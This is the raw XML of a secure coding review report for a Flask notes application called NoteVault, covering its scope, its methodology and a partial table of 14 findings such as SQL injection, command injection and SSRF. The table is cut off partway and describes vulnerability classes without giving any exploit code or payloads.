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b/>
          <w:bCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t xml:space="preserve">SECURE CODING REVIEW REPORT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="5B6472"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">NoteVault — Python / Flask Notes Application</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="5B6472"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">Application version: sample audit build · Language: Python 3.12 · Framework: Flask 3.0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="5B6472"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">Review type: White-box manual source review + automated static analysis (Bandit)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="600"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="5B6472"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">Report date: 2026-07-24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pct" w:w="25%"/>
            <w:shd w:fill="F6DCDC" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="160"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="160"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="8B1E1E"/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
              </w:rPr>
              <w:t xml:space="preserve">4</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="8B1E1E"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="FBE3D3" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="160"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="160"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="B8471F"/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
              </w:rPr>
              <w:t xml:space="preserve">6</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="B8471F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="FBF0CE" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="160"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="160"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="9A6B00"/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
              </w:rPr>
              <w:t xml:space="preserve">3</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="9A6B00"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="DFF0DA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="160"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="160"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="3A6B35"/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
              </w:rPr>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="3A6B35"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="4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Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This report documents a secure coding review of NoteVault, a small internal Flask application that lets authenticated users create notes, search them, upload an avatar, and (for admins) run basic diagnostics. The review combined automated static analysis with manual source inspection, since each catches classes of issues the other tends to miss.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The review identified 14 findings: 4 Critical, 6 High, 3 Medium, 1 Low. The most significant issues are string-built SQL queries that allow authentication bypass and data exfiltration, an unauthenticated command-injection endpoint, and unsafe deserialization of a client-controlled cookie — any one of which could lead to full compromise of the application and its data.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A remediated version of the application is included alongside this report, with every fix traceable back to a finding ID (e.g. "FIX (F1)") in code comments, and a re-run of the same static analyzer confirming the high/medium/critical findings no longer trigger.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="400"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. Scope and Methodology</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.1 Scope</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In scope: the full NoteVault application source (app.py and templates) — authentication, note CRUD, search, file upload/download, admin utilities, and preference storage. Out of scope: infrastructure/hosting configuration, network security controls, and third-party dependency vulnerabilities (recommended as a separate SCA scan).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.2 Methodology</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Automated static analysis using Bandit, a static analyzer purpose-built for Python security issues, run against the full source tree.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Manual line-by-line source review of every route handler, focused on trust boundaries: anywhere user input enters the application (query params, form data, cookies, uploaded files) and anywhere the app performs a sensitive operation (DB queries, shell commands, file I/O, deserialization, network calls).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Manual review specifically to catch classes of bugs static analyzers structurally cannot: business-logic authorization (IDOR, missing admin checks), CSRF, session handling, and security header configuration — none of which involve a "dangerous function call" a pattern-matching tool can flag.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Each finding was validated with a proof-of-concept request or payload before being recorded, to avoid false positives inflating the report.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.3 Tools used</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Bandit v1.9.4 (Python static analyzer) — full output in Appendix A.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Manual code review — primary method for authorization, session, and configuration findings.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Bandit surfaced most of the injection- and crypto-class findings (SQL injection, MD5 usage, command injection, pickle usage, debug mode) automatically. It did not — and structurally could not — catch the IDOR, missing admin authorization, CSRF, session-fixation, or missing-headers findings, which required tracing request handling logic by hand. This is the expected, complementary split between automated and manual review, not a gap in either.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="400"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. Summary of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2000"/>
        <w:gridCol w:w="2800"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="8%"/>
            <w:shd w:fill="1F2937" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="44%"/>
            <w:shd w:fill="1F2937" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Finding</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="20%"/>
            <w:shd w:fill="1F2937" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="28%"/>
            <w:shd w:fill="1F2937" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">CWE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="8%"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">F1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="44%"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">SQL Injection (registration, login, search)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="20%"/>
            <w:shd w:fill="F6DCDC" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="8B1E1E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="28%"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">CWE-89</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="8%"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">F5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="44%"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Broken access control — IDOR and missing admin checks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="20%"/>
            <w:shd w:fill="F6DCDC" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="8B1E1E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="28%"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">CWE-639 / CWE-862</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="8%"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">F6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="44%"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">OS command injection in network diagnostic endpoint</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="20%"/>
            <w:shd w:fill="F6DCDC" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="8B1E1E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="28%"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">CWE-78</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="8%"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">F8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="44%"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Insecure deserialization via pickle in cookies</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="20%"/>
            <w:shd w:fill="F6DCDC" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="8B1E1E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="28%"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">CWE-502</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="8%"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">F2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="44%"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Stored Cross-Site Scripting (XSS) in note viewing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="20%"/>
            <w:shd w:fill="FBE3D3" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="B8471F"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="28%"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">CWE-79</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="8%"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">F3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="44%"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Hardcoded secrets and credentials</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="20%"/>
            <w:shd w:fill="FBE3D3" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="B8471F"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="28%"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">CWE-798</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="8%"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">F4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="44%"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Weak, unsalted password hashing (MD5)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="20%"/>
            <w:shd w:fill="FBE3D3" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="B8471F"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="28%"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">CWE-327 / CWE-916</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="8%"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">F7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="44%"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Server-Side Request Forgery (SSRF) in URL fetch feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="20%"/>
            <w:shd w:fill="FBE3D3" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="B8471F"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="28%"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">CWE-918</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="8%"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">F9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="44%"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Path traversal in file download endpoint</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="20%"/>
            <w:shd w:fill="FBE3D3" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="B8471F"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="28%"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">CWE-22</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="8%"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">F10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="44%"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Unrestricted file upload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="20%"/>
            <w:shd w:fill="FBE3D3" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="B8471F"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="28%"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">CWE-434</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="8%"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">F11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="44%"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Missing CSRF protection on state-changing requests</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="20%"/>
            <w:shd w:fill="FBF0CE" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="9A6B00"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="28%"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">CWE-352</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="8%"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">F12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="44%"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
